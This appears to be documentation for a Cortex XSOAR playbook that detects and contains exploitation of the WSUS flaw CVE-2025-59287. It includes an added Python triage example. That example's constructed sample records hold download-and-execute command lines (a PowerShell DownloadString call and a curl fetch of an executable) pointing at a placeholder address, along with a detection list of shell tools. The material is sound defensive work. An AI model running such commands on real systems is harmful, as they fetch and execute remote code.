CVE-2025-59287 - Microsoft WSUS Remote Code Execution
This Playbook is part of the Cortex Response And Remediation Pack.
Supported versions
Supported Cortex XSOAR versions: 8.9.0 and later.
Vulnerability Overview
- Vulnerability Name: Microsoft Windows Server Update Service (WSUS) Deserialization of Untrusted Data Vulnerability
- CVE ID: CVE-2025-59287
- CVSS Score: 9.8 (Critical)
An unauthenticated remote code execution (RCE) vulnerability, rooted in deserialization of untrusted data, has been identified in Microsoft Windows Server Update Services (WSUS). Source: Unit42 - Palo Alto Networks
Mitigation and Recommendations
- Apply the Microsoft security update that addresses CVE-2025-59287 on every WSUS server.
- Restrict access to the vulnerable servers: limit inbound traffic to the WSUS ports (8530/TCP and 8531/TCP by default) to trusted management networks and never expose WSUS to the Internet.
- Monitor WSUS servers for the published IoCs and for anomalous process activity or outbound traffic originating from the WSUS service.
Conclusion
CVE-2025-59287 is a critical, remotely exploitable vulnerability in WSUS that allows unauthenticated attackers to execute arbitrary code with SYSTEM privileges.
View official CVE details on NIST
Playbook Triggers
- Manually
- Automatically, by the "CVE Exploitation - 2037164431" or "CVE Exploitation - 3823999562" Agent rules
Playbook Flow
- Uses XQL to identify WSUS servers in your environment.
- Collects IOCs from the Unit42 blog.
- Uses XQL to detect any suspicious command lines indicative of exploitation of this vulnerability.
- Investigates the command lines to identify malicious indicators related to the vulnerability.
- Uses XQL to hunt for malicious IOCs.
- Isolates compromised WSUS servers.
- Blocks malicious indicators using the "Containment Plan - Block Indicators" playbook.
- Provides mitigation recommendations.
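The hunting and investigation steps above (suspicious command lines on WSUS servers, indicator extraction, isolation of the affected host, blocking of the indicators) expressed as plain Python over a few constructed process-creation records. This is an added example, not code from the Cortex playbook or from the Unit42 report: the record field names, the sample records, the 203.0.113.0/24 addresses and the parent/child heuristic (the WSUS service or its IIS worker process w3wp.exe spawning a shell or a download utility) are assumptions of the example, not something this page states. In the playbook the equivalent query runs as XQL against endpoint telemetry; the point here is the detection logic, not the query syntax.

```python
"""Triage of process-creation records from WSUS servers (illustrative only).

Added example; not part of the Cortex playbook. Field names and the
parent/child heuristic are assumptions, see the lead-in.
"""
import base64
import re

# Processes that host WSUS code on a server: the WSUS service itself and the
# IIS worker process serving its web endpoints (assumption).
WSUS_HOST_PROCESSES = {"wsusservice.exe", "w3wp.exe"}

# Children a WSUS process should never launch (assumption; extend to taste).
SHELL_PROCESSES = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe",
    "bitsadmin.exe", "mshta.exe", "rundll32.exe", "curl.exe",
}

# PowerShell's -e / -ec / -enc / -EncodedCommand switch followed by base64.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def basename(path):
    """Lower-cased file name of a Windows path, for process comparisons."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Plaintext of a PowerShell -EncodedCommand payload, or None.

    PowerShell base64-encodes the UTF-16LE bytes of the script, so the
    decoded bytes must be read as UTF-16LE, not UTF-8.
    """
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_indicators(text):
    """URLs and IPv4 addresses embedded in a command line."""
    found = set(URL_RE.findall(text))
    found.update(IPV4_RE.findall(text))
    return found


def analyze_event(ev):
    """Classify one record; an empty 'reasons' list means it looks benign.

    Indicators are only extracted from records that were flagged, so an
    admin's interactive script does not pollute the block list.
    """
    parent, child = basename(ev["parent_image"]), basename(ev["image"])
    cmdline = ev.get("cmdline", "")
    reasons = []
    wsus_spawned_shell = parent in WSUS_HOST_PROCESSES and child in SHELL_PROCESSES
    if wsus_spawned_shell:
        reasons.append(f"{parent} spawned {child}")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded PowerShell payload")
        cmdline += " " + decoded  # hunt for indicators inside the payload too
    indicators = extract_indicators(cmdline) if reasons else set()
    return {"reasons": reasons, "wsus_spawned_shell": wsus_spawned_shell,
            "indicators": sorted(indicators)}


def triage(events):
    """Return (findings, hosts_to_isolate, iocs_to_block) for a batch of records."""
    findings, isolate, iocs = [], set(), set()
    for ev in events:
        result = analyze_event(ev)
        if not result["reasons"]:
            continue
        findings.append({"host": ev["host"], **result})
        if result["wsus_spawned_shell"]:
            isolate.add(ev["host"])
        iocs.update(result["indicators"])
    return findings, isolate, iocs


# Constructed sample records (documentation range 203.0.113.0/24); not real
# telemetry and not taken from the Unit42 report.
SAMPLE_PAYLOAD = ("IEX (New-Object Net.WebClient)"
                  ".DownloadString('http://203.0.113.10:8080/stage.ps1')")
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"host": "wsus01", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmdline": 'w3wp.exe -ap "WsusPool"'},                      # benign: IIS starts the pool
    {"host": "wsus01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\cleanup.ps1"},  # benign admin
    {"host": "wsus01", "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": f"cmd.exe /c powershell.exe -nop -w hidden -enc {SAMPLE_ENCODED}"},  # suspicious
    {"host": "wsus02", "parent_image": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Windows\Temp\u.exe http://203.0.113.10/u.exe"},  # suspicious
]

if __name__ == "__main__":
    findings, isolate, iocs = triage(SAMPLE_EVENTS)
    for f in findings:
        print(f["host"], "|", "; ".join(f["reasons"]), "|", f["indicators"])
    print("isolate:", sorted(isolate))
    print("block:", sorted(iocs))
```

The two flagged records are the ones the playbook would act on: the hosts go to the isolation step and the extracted URL and address go to the "Containment Plan - Block Indicators" sub-playbook. A real deployment should also keep the benign IIS and admin records in view, since tuning the parent/child and encoded-command heuristics against normal WSUS activity is what keeps the isolation step from firing on legitimate maintenance.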
Dependencies
This playbook uses the following sub-playbooks, integrations, and scripts.
Sub-playbooks
- Containment Plan - Block Indicators
Integrations
This playbook does not use any integrations.
Scripts
- CommandLineAnalysis
- IsIntegrationAvailable
- ParseHTMLIndicators
- SetAndHandleEmpty
- isolate-endpoint
Commands
- associateIndicatorsToAlert
- closeInvestigation
- createNewIndicator
- extractIndicators
- setAlert
- xdr-xql-generic-query
Playbook Inputs
There are no inputs for this playbook.
Playbook Outputs
There are no outputs for this playbook.
Playbook Image
